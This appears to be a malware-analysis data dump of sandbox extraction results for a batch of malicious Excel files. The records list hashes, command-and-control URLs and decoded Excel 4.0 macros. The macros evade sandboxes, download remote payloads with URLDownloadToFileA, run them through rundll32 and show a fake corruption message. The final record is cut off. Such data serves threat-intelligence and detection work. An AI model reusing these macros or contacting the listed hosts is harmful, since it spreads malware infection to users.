{"version":"0.2","sample":{"sample":"","kind":"file","target":"8cd2069bff5e4a56c7facde495421485cc989e8edae106d35e6d91983f1fb111"},"analysis":{"reported":"2020-04-09T16:17:36Z","score":10},"files":[{"filename":"8cd2069bff5e4a56c7facde495421485cc989e8edae106d35e6d91983f1fb111","filesize":185344,"md5":"b053753867363af3b5ce8547dd51fe6e","sha1":"1b40a14e0086dd65ecffadae56c854e7270bd077","sha256":"8cd2069bff5e4a56c7facde495421485cc989e8edae106d35e6d91983f1fb111","sha512":"079bbe6902bff603d2d86b7d60da3ed077f6539c95d3a1a69661cd9732b93b5d7adb0ee3537bdcb03e01085d9972bf05f5edea99651048dc87db1b9628f830ba","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8cd2069bff5e4a56c7facde495421485cc989e8edae106d35e6d91983f1fb111.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8cd66ac502a2361a6e42676af32babc8e1b06099e8d2283c39999c6d8b5fc342"},"analysis":{"reported":"2020-04-09T16:17:36Z","score":10},"files":[{"filename":"8cd66ac502a2361a6e42676af32babc8e1b06099e8d2283c39999c6d8b5fc342","filesize":206336,"md5":"fb730a1029b0c65cc35d9eb1f803244f","sha1":"4f3882638f165f74f2a68562aee4703d3fba0fad","sha256":"8cd66ac502a2361a6e42676af32babc8e1b06099e8d2283c39999c6d8b5fc342","sha512":"2ae0f4471def86cd6cfc1f57131426aff11bb5ce902f73e68b98a02dd9c8c7445673944f4394cb6c6baae3fe8ccb27f1ad656648ce8e23386bba7b553d5a65c9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8cd66ac502a2361a6e42676af32babc8e1b06099e8d2283c39999c6d8b5fc342.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CAuniD6Hlr\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8cd8779e7e38892e2c83017a2dbf8048ecd96271e5e2c5e5e8f43407d076975e"},"analysis":{"reported":"2020-04-09T16:17:36Z","score":10},"files":[{"filename":"8cd8779e7e38892e2c83017a2dbf8048ecd96271e5e2c5e5e8f43407d076975e","filesize":209920,"md5":"ce307b18eaee8268a9c3eea0418b5e38","sha1":"690f5faa73f45848ce1cfa973328e8dcc1cd42af","sha256":"8cd8779e7e38892e2c83017a2dbf8048ecd96271e5e2c5e5e8f43407d076975e","sha512":"e6235af3388c511b8fc43bdd4661b6bb42ecc653be591323503e18b2cce7481b5d6f335def341f77d3f50f5295001224155608b24173ecf4964befb5d587b12e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8cd8779e7e38892e2c83017a2dbf8048ecd96271e5e2c5e5e8f43407d076975e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qJzyavSAck\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8cebf7d1b746add67b1e2cabbd616f96eacfe620680ee1c1b9c7000e9afd54d8"},"analysis":{"reported":"2020-04-09T16:17:36Z","score":10},"files":[{"filename":"8cebf7d1b746add67b1e2cabbd616f96eacfe620680ee1c1b9c7000e9afd54d8","filesize":168448,"md5":"16e605799319c82919a9b8a4ac058ecf","sha1":"397fcaff8ec158ca859ebe5a9fe99e45a42cf4b3","sha256":"8cebf7d1b746add67b1e2cabbd616f96eacfe620680ee1c1b9c7000e9afd54d8","sha512":"72fabf0705fe7afcab6c0b1cb9a0ceb8f4177745f2191cad77db05afc07b0f28a25da154760aae84d2d2e6d0ccc365a0c073137c3fc3c0f64c4924e355998d5d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8cebf7d1b746add67b1e2cabbd616f96eacfe620680ee1c1b9c7000e9afd54d8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"IonkEaocKN\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8cfc169a81af3ba635e67e00cf403dd1242237ed0e49c1df72f9a15d01e3d797"},"analysis":{"reported":"2020-04-09T16:17:36Z","score":10},"files":[{"filename":"8cfc169a81af3ba635e67e00cf403dd1242237ed0e49c1df72f9a15d01e3d797","filesize":185344,"md5":"a6770ca9cebb73cb09e4a34520b6f4de","sha1":"1c3b9dffd987db98ec6bc8ae77b210b173c4afe0","sha256":"8cfc169a81af3ba635e67e00cf403dd1242237ed0e49c1df72f9a15d01e3d797","sha512":"e9061ff59a1509907bfe90775470891b00d7a40f5171eeb3f88faa4ce57cec478597a030c9eea46ed567a66f8ebe73093ca44b81921991dd375e89d0ad074c8f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8cfc169a81af3ba635e67e00cf403dd1242237ed0e49c1df72f9a15d01e3d797.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8d011dddc4e723204ade06a72b2cdbf960a76a4038e902c05ec469a60e9fcafe"},"analysis":{"reported":"2020-04-09T16:17:36Z","score":10},"files":[{"filename":"8d011dddc4e723204ade06a72b2cdbf960a76a4038e902c05ec469a60e9fcafe","filesize":207360,"md5":"c51cf3b43a4254fe729f829d84a11e7d","sha1":"dcf568f0b19e89e97aed86653ffcffc7feb4dcad","sha256":"8d011dddc4e723204ade06a72b2cdbf960a76a4038e902c05ec469a60e9fcafe","sha512":"46fa4298e4a9b4ed5ba6d773c108a29c7677a1fd9ff195cb5454e68ef1383fe3510034bfbd3ede81d06ba881188aad97f475a8bc44d7258e3a34b80a289670ad","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8d011dddc4e723204ade06a72b2cdbf960a76a4038e902c05ec469a60e9fcafe.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://greentec-automation.com/wp-crun.php","https://narensyndicate.com/wp-crun.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://greentec-automation.com/wp-crun.php\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://narensyndicate.com/wp-crun.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7UxW8nfm0R\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8d0e3b6249749dd9a6c025cac07c9273e4a821f229809ad3adc5745e235638b5"},"analysis":{"reported":"2020-04-09T16:17:37Z","score":10},"files":[{"filename":"8d0e3b6249749dd9a6c025cac07c9273e4a821f229809ad3adc5745e235638b5","filesize":112128,"md5":"19020f4a192338fab38fe28128176846","sha1":"e3939a7b00dd9bf6642b23b77b224f35590cc174","sha256":"8d0e3b6249749dd9a6c025cac07c9273e4a821f229809ad3adc5745e235638b5","sha512":"47cf0fa1970c6e2dadb674bce78cb87457c8d1438b8be5a0bfab15870d739e064210df214c1f5ffa940077486138f90f54cc917ee26c6249560f4aa285e187cf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8d0e3b6249749dd9a6c025cac07c9273e4a821f229809ad3adc5745e235638b5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8d22298fc2b298bd61b71e7aadded45eb909b1bb0193264d1d5d512e33b7bdd4"},"analysis":{"reported":"2020-04-09T16:17:37Z","score":10},"files":[{"filename":"8d22298fc2b298bd61b71e7aadded45eb909b1bb0193264d1d5d512e33b7bdd4","filesize":132608,"md5":"d8c09e02576de6f0d2e84aa9ec483824","sha1":"9d192cca1b6f8abe62af2e9b4c3207e06f5509dd","sha256":"8d22298fc2b298bd61b71e7aadded45eb909b1bb0193264d1d5d512e33b7bdd4","sha512":"1c082d030d419f856c669188f720cc69e002f598542487f2d130c3bd9e560d65c0bfd1461a8e51aa5ee0540ba07e7bb7a11383dad7517d5d41838fb94b31677c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8d22298fc2b298bd61b71e7aadded45eb909b1bb0193264d1d5d512e33b7bdd4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"O1YUgUbiZ7\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8d2c2a21b457ed4882bbeafe49f69fce63d78e67c5514b6c46eb732ba25f7bf1"},"analysis":{"reported":"2020-04-09T16:17:37Z","score":10},"files":[{"filename":"8d2c2a21b457ed4882bbeafe49f69fce63d78e67c5514b6c46eb732ba25f7bf1","filesize":209920,"md5":"61c4bbe2ce58fdd65eac3e41bcb98c69","sha1":"da6d0de340cbc8cdd051d23439653ce5920c3bc8","sha256":"8d2c2a21b457ed4882bbeafe49f69fce63d78e67c5514b6c46eb732ba25f7bf1","sha512":"4992bce7455853dcc4656854ecfd934f098715a25234c981992f1355b2b911c79327a98804bdd411d76baa1e4bc2d6892120ee1fd386a676df3c256feae58eb9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8d2c2a21b457ed4882bbeafe49f69fce63d78e67c5514b6c46eb732ba25f7bf1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MeEPLewMJY\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8d2eec430ef40aab734b6cd815b2b2ae170220b0f915eebb5c4db09a2de3b044"},"analysis":{"reported":"2020-04-09T16:17:37Z","score":10},"files":[{"filename":"8d2eec430ef40aab734b6cd815b2b2ae170220b0f915eebb5c4db09a2de3b044","filesize":225280,"md5":"6d6c897a9a39d021e14f26593cc2ba10","sha1":"ade1b5f1c99edf18c84e24aaeae55f154fb0e7c8","sha256":"8d2eec430ef40aab734b6cd815b2b2ae170220b0f915eebb5c4db09a2de3b044","sha512":"f2dfdabffd3e1675f0f01679411df355bc95f4309f8b00d3d7decff3d82a55c54cfe72bd14279dceffff8621a06df85d49dca41281a93a05cf78f22c4367c1f3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8d2eec430ef40aab734b6cd815b2b2ae170220b0f915eebb5c4db09a2de3b044.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"EeZhlG1iDd\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8d33b6a95745aec8e038fcd293da24f59e77e625c0e615984f2cdc3243648cca"},"analysis":{"reported":"2020-04-09T16:17:37Z","score":10},"files":[{"filename":"8d33b6a95745aec8e038fcd293da24f59e77e625c0e615984f2cdc3243648cca","filesize":113664,"md5":"f8bf4a4bd7ebf5c421ff969227573e8e","sha1":"92454a350e1ad8913a306c3fa679b522e5285c2a","sha256":"8d33b6a95745aec8e038fcd293da24f59e77e625c0e615984f2cdc3243648cca","sha512":"b3d33739472d64ba55c8ed02ab22f58c5e8d69f572a2753e02b2f3f6d28a3d46cd991b4deb94d3704cd0398a965898cfb06dc4a47d623b2a9f479f1f66a1eb1c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8d33b6a95745aec8e038fcd293da24f59e77e625c0e615984f2cdc3243648cca.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bz4YpVerGo\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8d35cdaf9773f05eaf31567179297386b1bf464d5865470d83157b93b58a41de"},"analysis":{"reported":"2020-04-09T16:17:37Z","score":10},"files":[{"filename":"8d35cdaf9773f05eaf31567179297386b1bf464d5865470d83157b93b58a41de","filesize":168960,"md5":"2610c004b1ca15081ccadd41bfbee096","sha1":"a6510d7f3bdfe36fc59be3c6f65d44c422b379c7","sha256":"8d35cdaf9773f05eaf31567179297386b1bf464d5865470d83157b93b58a41de","sha512":"f734242ea9d4a1f15740f024897d91f661405fa790128f05575feb3b35130bb5cbe1061341da97473e56066d071a58a71f84c9e65662df47a7969fa01c1ce6fb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8d35cdaf9773f05eaf31567179297386b1bf464d5865470d83157b93b58a41de.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BalqrEj6N3\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8d4d480d649abdc550abb15ea56977911dfdba0046b3d05928e8bd008d08a7d0"},"analysis":{"reported":"2020-04-09T16:17:37Z","score":10},"files":[{"filename":"8d4d480d649abdc550abb15ea56977911dfdba0046b3d05928e8bd008d08a7d0","filesize":116224,"md5":"de41c24be576856c9a1c09d350c3d674","sha1":"f2d2dd2d30e5d001e6539b7ad169cbb93ba32e8a","sha256":"8d4d480d649abdc550abb15ea56977911dfdba0046b3d05928e8bd008d08a7d0","sha512":"b326212cf7075bb74aceca80430fb516e63b28420acd85f5ff5c052871447110475487d99cc35500aea7d794eaa25ff34ce250c28299344f952ad87d214cea29","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8d4d480d649abdc550abb15ea56977911dfdba0046b3d05928e8bd008d08a7d0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"j9JqV4rIdy\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8d54147983ff1fa78268b31d938236f864dd5ad1252da54800d69b0673181d3b"},"analysis":{"reported":"2020-04-09T16:17:37Z","score":10},"files":[{"filename":"8d54147983ff1fa78268b31d938236f864dd5ad1252da54800d69b0673181d3b","filesize":177152,"md5":"8e2efd860971edfbedca79eaa9c7c0ab","sha1":"28f8fa40479a7289082b923d444dac635ea184b7","sha256":"8d54147983ff1fa78268b31d938236f864dd5ad1252da54800d69b0673181d3b","sha512":"0024fde62962de8e2851f32bdb15840e6a0fde3dacd9bf6dc0b942c1a1b0af4b03d1fe2faa468aaffb4ff7c7653e8854fc3ecdd68982e9411b8df0b07f5b2409","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8d54147983ff1fa78268b31d938236f864dd5ad1252da54800d69b0673181d3b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), 